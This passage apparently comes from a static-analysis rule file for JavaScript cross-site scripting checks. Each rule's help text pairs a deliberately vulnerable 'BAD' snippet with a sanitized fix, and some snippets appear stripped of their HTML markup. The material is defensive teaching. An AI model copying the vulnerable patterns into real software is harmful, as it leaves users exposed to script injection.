OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://owasp.org/www-community/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", + "markdown" : "# DOM text reinterpreted as HTML\nExtracting text from a DOM node and interpreting it as HTML can lead to a cross-site scripting vulnerability.\n\nA webpage with this vulnerability reads text from the DOM, and afterwards adds the text as HTML to the DOM. Using text from the DOM as HTML effectively unescapes the text, and thereby invalidates any escaping done on the text. If an attacker is able to control the safe sanitized text, then this vulnerability can be exploited to perform a cross-site scripting attack.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing text to the page, or one of the other solutions that are mentioned in the References section below.\n\n\n## Example\nThe following example shows a webpage using a `data-target` attribute to select and manipulate a DOM element using the JQuery library. In the example, the `data-target` attribute is read into the `target` variable, and the `$` function is then supposed to use the `target` variable as a CSS selector to determine which element should be manipulated.\n\n\n```javascript\n$(\"button\").click(function () {\n var target = $(this).attr(\"data-target\");\n $(target).hide();\n});\n\n```\nHowever, if an attacker can control the `data-target` attribute, then the value of `target` can be used to cause the `$` function to execute arbitrary JavaScript.\n\nThe above vulnerability can be fixed by using `$.find` instead of `$`. The `$.find` function will only interpret `target` as a CSS selector and never as HTML, thereby preventing an XSS attack.\n\n\n```javascript\n$(\"button\").click(function () {\n var target = $(this).attr(\"data-target\");\n\t$.find(target).hide();\n});\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://owasp.org/www-community/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116" ], + "description" : "Reinterpreting text from the DOM as HTML\n can lead to a cross-site scripting vulnerability.", + "id" : "js/xss-through-dom", + "kind" : "path-problem", + "name" : "DOM text reinterpreted as HTML", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "6.1" + } + }, { + "id" : "js/xss-through-exception", + "name" : "js/xss-through-exception", + "shortDescription" : { + "text" : "Exception text reinterpreted as HTML" + }, + "fullDescription" : { + "text" : "Reinterpreting text from an exception as HTML can lead to a cross-site scripting vulnerability." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Exception text reinterpreted as HTML\nDirectly writing error messages to a webpage without sanitization allows for a cross-site scripting vulnerability if parts of the error message can be influenced by a user.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing user input to the page, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example shows an exception being written directly to the document, and this exception can potentially be influenced by the page URL, leaving the website vulnerable to cross-site scripting.\n\n\n```javascript\nfunction setLanguageOptions() {\n var href = document.location.href,\n deflt = href.substring(href.indexOf(\"default=\")+8);\n \n try {\n var parsed = unknownParseFunction(deflt); \n } catch(e) {\n document.write(\"Had an error: \" + e + \".\");\n }\n}\n\n```\n\n## Example\nThis second example shows an input being validated using the JSON schema validator `ajv`, and in case of an error, the error message is sent directly back in the response.\n\n\n```javascript\nimport express from 'express';\nimport Ajv from 'ajv';\n\nlet app = express();\nlet ajv = new Ajv();\n\najv.addSchema({type: 'object', additionalProperties: {type: 'number'}}, 'pollData');\n\napp.post('/polldata', (req, res) => {\n if (!ajv.validate('pollData', req.body)) {\n res.send(ajv.errorsText());\n }\n});\n\n```\nThis is unsafe, because the error message can contain parts of the input. For example, the input `{'': 'foo'}` will generate the error `data/ should be number`, causing reflected XSS.\n\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", + "markdown" : "# Exception text reinterpreted as HTML\nDirectly writing error messages to a webpage without sanitization allows for a cross-site scripting vulnerability if parts of the error message can be influenced by a user.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing user input to the page, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example shows an exception being written directly to the document, and this exception can potentially be influenced by the page URL, leaving the website vulnerable to cross-site scripting.\n\n\n```javascript\nfunction setLanguageOptions() {\n var href = document.location.href,\n deflt = href.substring(href.indexOf(\"default=\")+8);\n \n try {\n var parsed = unknownParseFunction(deflt); \n } catch(e) {\n document.write(\"Had an error: \" + e + \".\");\n }\n}\n\n```\n\n## Example\nThis second example shows an input being validated using the JSON schema validator `ajv`, and in case of an error, the error message is sent directly back in the response.\n\n\n```javascript\nimport express from 'express';\nimport Ajv from 'ajv';\n\nlet app = express();\nlet ajv = new Ajv();\n\najv.addSchema({type: 'object', additionalProperties: {type: 'number'}}, 'pollData');\n\napp.post('/polldata', (req, res) => {\n if (!ajv.validate('pollData', req.body)) {\n res.send(ajv.errorsText());\n }\n});\n\n```\nThis is unsafe, because the error message can contain parts of the input. For example, the input `{'': 'foo'}` will generate the error `data/ should be number`, causing reflected XSS.\n\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116" ], + "description" : "Reinterpreting text from an exception as HTML\n can lead to a cross-site scripting vulnerability.", + "id" : "js/xss-through-exception", + "kind" : "path-problem", + "name" : "Exception text reinterpreted as HTML", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "6.1" + } + }, { + "id" : "js/unsafe-jquery-plugin", + "name" : "js/unsafe-jquery-plugin", + "shortDescription" : { + "text" : "Unsafe jQuery plugin" + }, + "fullDescription" : { + "text" : "A jQuery plugin that unintentionally constructs HTML from some of its options may be unsafe to use for clients." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Unsafe jQuery plugin\nLibrary plugins, such as those for the jQuery library, are often configurable through options provided by the clients of the plugin. Clients, however, do not know the implementation details of the plugin, so it is important to document the capabilities of each option. The documentation for the plugin options that the client is responsible for sanitizing is of particular importance. Otherwise, the plugin may write user input (for example, a URL query parameter) to a web page without properly sanitizing it first, which allows for a cross-site scripting vulnerability in the client application through dynamic HTML construction.\n\n\n## Recommendation\nDocument all options that can lead to cross-site scripting attacks, and guard against unsafe inputs where dynamic HTML construction is not intended.\n\n\n## Example\nThe following example shows a jQuery plugin that selects a DOM element, and copies its text content to another DOM element. The selection is performed by using the plugin option `sourceSelector` as a CSS selector.\n\n\n```javascript\njQuery.fn.copyText = function(options) {\n\t// BAD may evaluate `options.sourceSelector` as HTML\n\tvar source = jQuery(options.sourceSelector),\n\t text = source.text();\n\tjQuery(this).text(text);\n}\n\n```\nThis is, however, not a safe plugin, since the call to `jQuery` interprets `sourceSelector` as HTML if it is a string that starts with `<`.\n\nInstead of documenting that the client is responsible for sanitizing `sourceSelector`, the plugin can use `jQuery.find` to always interpret `sourceSelector` as a CSS selector:\n\n\n```javascript\njQuery.fn.copyText = function(options) {\n\t// GOOD may not evaluate `options.sourceSelector` as HTML\n\tvar source = jQuery.find(options.sourceSelector),\n\t text = source.text();\n\tjQuery(this).text(text);\n}\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* jQuery: [Plugin creation](https://learn.jquery.com/plugins/basic-plugin-creation/).\n* Bootstrap: [XSS vulnerable bootstrap plugins](https://github.com/twbs/bootstrap/pull/27047).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", + "markdown" : "# Unsafe jQuery plugin\nLibrary plugins, such as those for the jQuery library, are often configurable through options provided by the clients of the plugin. Clients, however, do not know the implementation details of the plugin, so it is important to document the capabilities of each option. The documentation for the plugin options that the client is responsible for sanitizing is of particular importance. Otherwise, the plugin may write user input (for example, a URL query parameter) to a web page without properly sanitizing it first, which allows for a cross-site scripting vulnerability in the client application through dynamic HTML construction.\n\n\n## Recommendation\nDocument all options that can lead to cross-site scripting attacks, and guard against unsafe inputs where dynamic HTML construction is not intended.\n\n\n## Example\nThe following example shows a jQuery plugin that selects a DOM element, and copies its text content to another DOM element. The selection is performed by using the plugin option `sourceSelector` as a CSS selector.\n\n\n```javascript\njQuery.fn.copyText = function(options) {\n\t// BAD may evaluate `options.sourceSelector` as HTML\n\tvar source = jQuery(options.sourceSelector),\n\t text = source.text();\n\tjQuery(this).text(text);\n}\n\n```\nThis is, however, not a safe plugin, since the call to `jQuery` interprets `sourceSelector` as HTML if it is a string that starts with `<`.\n\nInstead of documenting that the client is responsible for sanitizing `sourceSelector`, the plugin can use `jQuery.find` to always interpret `sourceSelector` as a CSS selector:\n\n\n```javascript\njQuery.fn.copyText = function(options) {\n\t// GOOD may not evaluate `options.sourceSelector` as HTML\n\tvar source = jQuery.find(options.sourceSelector),\n\t text = source.text();\n\tjQuery(this).text(text);\n}\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* jQuery: [Plugin creation](https://learn.jquery.com/plugins/basic-plugin-creation/).\n* Bootstrap: [XSS vulnerable bootstrap plugins](https://github.com/twbs/bootstrap/pull/27047).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116", "frameworks/jquery" ], + "description" : "A jQuery plugin that unintentionally constructs HTML from some of its options may be unsafe to use for clients.", + "id" : "js/unsafe-jquery-plugin", + "kind" : "path-problem", + "name" : "Unsafe jQuery plugin", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "6.1" + } + }, { + "id" : "js/xss", + "name" : "js/xss", + "shortDescription" : { + "text" : "Client-side cross-site scripting" + }, + "fullDescription" : { + "text" : "Writing user input directly to the DOM allows for a cross-site scripting vulnerability." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Client-side cross-site scripting\nDirectly writing user input (for example, a URL query parameter) to a webpage without properly sanitizing the input first, allows for a cross-site scripting vulnerability.\n\nThis kind of vulnerability is also called *DOM-based* cross-site scripting, to distinguish it from other types of cross-site scripting.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing user input to the page, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example shows part of the page URL being written directly to the document, leaving the website vulnerable to cross-site scripting.\n\n\n```javascript\nfunction setLanguageOptions() {\n var href = document.location.href,\n deflt = href.substring(href.indexOf(\"default=\")+8);\n document.write(\"\");\n document.write(\"\");\n}\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", + "markdown" : "# Client-side cross-site scripting\nDirectly writing user input (for example, a URL query parameter) to a webpage without properly sanitizing the input first, allows for a cross-site scripting vulnerability.\n\nThis kind of vulnerability is also called *DOM-based* cross-site scripting, to distinguish it from other types of cross-site scripting.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing user input to the page, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example shows part of the page URL being written directly to the document, leaving the website vulnerable to cross-site scripting.\n\n\n```javascript\nfunction setLanguageOptions() {\n var href = document.location.href,\n deflt = href.substring(href.indexOf(\"default=\")+8);\n document.write(\"\");\n document.write(\"\");\n}\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116" ], + "description" : "Writing user input directly to the DOM allows for\n a cross-site scripting vulnerability.", + "id" : "js/xss", + "kind" : "path-problem", + "name" : "Client-side cross-site scripting", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "6.1" + } + }, { + "id" : "js/reflected-xss", + "name" : "js/reflected-xss", + "shortDescription" : { + "text" : "Reflected cross-site scripting" + }, + "fullDescription" : { + "text" : "Writing user input directly to an HTTP response allows for a cross-site scripting vulnerability." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Reflected cross-site scripting\nDirectly writing user input (for example, an HTTP request parameter) to an HTTP response without properly sanitizing the input first, allows for a cross-site scripting vulnerability.\n\nThis kind of vulnerability is also called *reflected* cross-site scripting, to distinguish it from other types of cross-site scripting.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing user input to the response, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example code writes part of an HTTP request (which is controlled by the user) directly to the response. This leaves the website vulnerable to cross-site scripting.\n\n\n```javascript\nvar app = require('express')();\n\napp.get('/user/:id', function(req, res) {\n if (!isValidUserId(req.params.id))\n // BAD: a request parameter is incorporated without validation into the response\n res.send(\"Unknown user: \" + req.params.id);\n else\n // TODO: do something exciting\n ;\n});\n\n```\nSanitizing the user-controlled data prevents the vulnerability:\n\n\n```javascript\nvar escape = require('escape-html');\n\nvar app = require('express')();\n\napp.get('/user/:id', function(req, res) {\n if (!isValidUserId(req.params.id))\n // GOOD: request parameter is sanitized before incorporating it into the response\n res.send(\"Unknown user: \" + escape(req.params.id));\n else\n // TODO: do something exciting\n ;\n});\n\n```\n\n## References\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", + "markdown" : "# Reflected cross-site scripting\nDirectly writing user input (for example, an HTTP request parameter) to an HTTP response without properly sanitizing the input first, allows for a cross-site scripting vulnerability.\n\nThis kind of vulnerability is also called *reflected* cross-site scripting, to distinguish it from other types of cross-site scripting.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing user input to the response, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example code writes part of an HTTP request (which is controlled by the user) directly to the response. This leaves the website vulnerable to cross-site scripting.\n\n\n```javascript\nvar app = require('express')();\n\napp.get('/user/:id', function(req, res) {\n if (!isValidUserId(req.params.id))\n // BAD: a request parameter is incorporated without validation into the response\n res.send(\"Unknown user: \" + req.params.id);\n else\n // TODO: do something exciting\n ;\n});\n\n```\nSanitizing the user-controlled data prevents the vulnerability:\n\n\n```javascript\nvar escape = require('escape-html');\n\nvar app = require('express')();\n\napp.get('/user/:id', function(req, res) {\n if (!isValidUserId(req.params.id))\n // GOOD: request parameter is sanitized before incorporating it into the response\n res.send(\"Unknown user: \" + escape(req.params.id));\n else\n // TODO: do something exciting\n ;\n});\n\n```\n\n## References\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116" ], + "description" : "Writing user input directly to an HTTP response allows for\n a cross-site scripting vulnerability.", + "id" : "js/reflected-xss", + "kind" : "path-problem", + "name" : "Reflected cross-site scripting", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "6.1" + } + }, { + "id" : "js/html-constructed-from-input", + "name" : "js/html-constructed-from-input", + "shortDescription" : { + "text" : "Unsafe HTML constructed from library input" + }, + "fullDescription" : { + "text" : "Using externally controlled strings to construct HTML might allow a malicious user to perform a cross-site scripting attack." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Unsafe HTML constructed from library input\nWhen a library function dynamically constructs HTML in a potentially unsafe way, then it's important to document to clients of the library that the function should only be used with trusted inputs. If the function is not documented as being potentially unsafe, then a client may inadvertently use inputs containing unsafe HTML fragments, and thereby leave the client vulnerable to cross-site scripting attacks.\n\n\n## Recommendation\nDocument all library functions that can lead to cross-site scripting attacks, and guard against unsafe inputs where dynamic HTML construction is not intended.\n\n\n## Example\nThe following example has a library function that renders a boldface name by writing to the `innerHTML` property of an element.\n\n\n```javascript\nmodule.exports = function showBoldName(name) {\n document.getElementById('name').innerHTML = \"\" + name + \"\";\n}\n\n```\nThis library function, however, does not escape unsafe HTML, and a client that calls the function with user-supplied input may be vulnerable to cross-site scripting attacks.\n\nThe library could either document that this function should not be used with unsafe inputs, or use safe APIs such as `innerText`.\n\n\n```javascript\nmodule.exports = function showBoldName(name) {\n const bold = document.createElement('b');\n bold.innerText = name;\n document.getElementById('name').appendChild(bold);\n}\n\n```\nAlternatively, an HTML sanitizer can be used to remove unsafe content.\n\n\n```javascript\n\nconst striptags = require('striptags');\nmodule.exports = function showBoldName(name) {\n document.getElementById('name').innerHTML = \"\" + striptags(name) + \"\";\n}\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", + "markdown" : "# Unsafe HTML constructed from library input\nWhen a library function dynamically constructs HTML in a potentially unsafe way, then it's important to document to clients of the library that the function should only be used with trusted inputs. If the function is not documented as being potentially unsafe, then a client may inadvertently use inputs containing unsafe HTML fragments, and thereby leave the client vulnerable to cross-site scripting attacks.\n\n\n## Recommendation\nDocument all library functions that can lead to cross-site scripting attacks, and guard against unsafe inputs where dynamic HTML construction is not intended.\n\n\n## Example\nThe following example has a library function that renders a boldface name by writing to the `innerHTML` property of an element.\n\n\n```javascript\nmodule.exports = function showBoldName(name) {\n document.getElementById('name').innerHTML = \"\" + name + \"\";\n}\n\n```\nThis library function, however, does not escape unsafe HTML, and a client that calls the function with user-supplied input may be vulnerable to cross-site scripting attacks.\n\nThe library could either document that this function should not be used with unsafe inputs, or use safe APIs such as `innerText`.\n\n\n```javascript\nmodule.exports = function showBoldName(name) {\n const bold = document.createElement('b');\n bold.innerText = name;\n document.getElementById('name').appendChild(bold);\n}\n\n```\nAlternatively, an HTML sanitizer can be used to remove unsafe content.\n\n\n```javascript\n\nconst striptags = require('striptags');\nmodule.exports = function showBoldName(name) {\n document.getElementById('name').innerHTML = \"\" + striptags(name) + \"\";\n}\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116" ], + "description" : "Using externally controlled strings to construct HTML might allow a malicious\n user to perform a cross-site scripting attack.", + "id" : "js/html-constructed-from-input", + "kind" : "path-problem", + "name" : "Unsafe HTML constructed from library input", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "6.1" + } + }, { + "id" : "js/stored-xss", + "name" : "js/stored-xss", + "shortDescription" : { + "text" : "Stored cross-site scripting" + }, + "fullDescription" : { + "text" : "Using uncontrolled stored values in HTML allows for a stored cross-site scripting vulnerability." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Stored cross-site scripting\nDirectly using uncontrolled stored value (for example, file names) to create HTML content without properly sanitizing the input first, allows for a cross-site scripting vulnerability.\n\nThis kind of vulnerability is also called *stored* cross-site scripting, to distinguish it from other types of cross-site scripting.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before using uncontrolled stored values to create HTML content, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example code writes file names directly to a HTTP response. This leaves the website vulnerable to cross-site scripting, if an attacker can choose the file names on the disk.\n\n\n```javascript\nvar express = require('express'),\n fs = require('fs');\n\nexpress().get('/list-directory', function(req, res) {\n fs.readdir('/public', function (error, fileNames) {\n var list = '
    ';\n fileNames.forEach(fileName => {\n // BAD: `fileName` can contain HTML elements\n list += '
  • ' + fileName + '
    • ';\n });\n list += '
'\n res.send(list);\n });\n});\n\n```\nSanitizing the file names prevents the vulnerability:\n\n\n```javascript\nvar express = require('express'),\n fs = require('fs'),\n escape = require('escape-html');\n\nexpress().get('/list-directory', function(req, res) {\n fs.readdir('/public', function (error, fileNames) {\n var list = '
    ';\n fileNames.forEach(fileName => {\n // GOOD: escaped `fileName` can not contain HTML elements\n list += '
  • ' + escape(fileName) + '
    • ';\n });\n list += '
'\n res.send(list);\n });\n});\n\n```\n\n## References\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", + "markdown" : "# Stored cross-site scripting\nDirectly using uncontrolled stored value (for example, file names) to create HTML content without properly sanitizing the input first, allows for a cross-site scripting vulnerability.\n\nThis kind of vulnerability is also called *stored* cross-site scripting, to distinguish it from other types of cross-site scripting.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before using uncontrolled stored values to create HTML content, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example code writes file names directly to a HTTP response. This leaves the website vulnerable to cross-site scripting, if an attacker can choose the file names on the disk.\n\n\n```javascript\nvar express = require('express'),\n fs = require('fs');\n\nexpress().get('/list-directory', function(req, res) {\n fs.readdir('/public', function (error, fileNames) {\n var list = '
    ';\n fileNames.forEach(fileName => {\n // BAD: `fileName` can contain HTML elements\n list += '
  • ' + fileName + '
    • ';\n });\n list += '
'\n res.send(list);\n });\n});\n\n```\nSanitizing the file names prevents the vulnerability:\n\n\n```javascript\nvar express = require('express'),\n fs = require('fs'),\n escape = require('escape-html');\n\nexpress().get('/list-directory', function(req, res) {\n fs.readdir('/public', function (error, fileNames) {\n var list = '
    ';\n fileNames.forEach(fileName => {\n // GOOD: escaped `fileName` can not contain HTML elements\n list += '
  • ' + escape(fileName) + '
    • ';\n });\n list += '
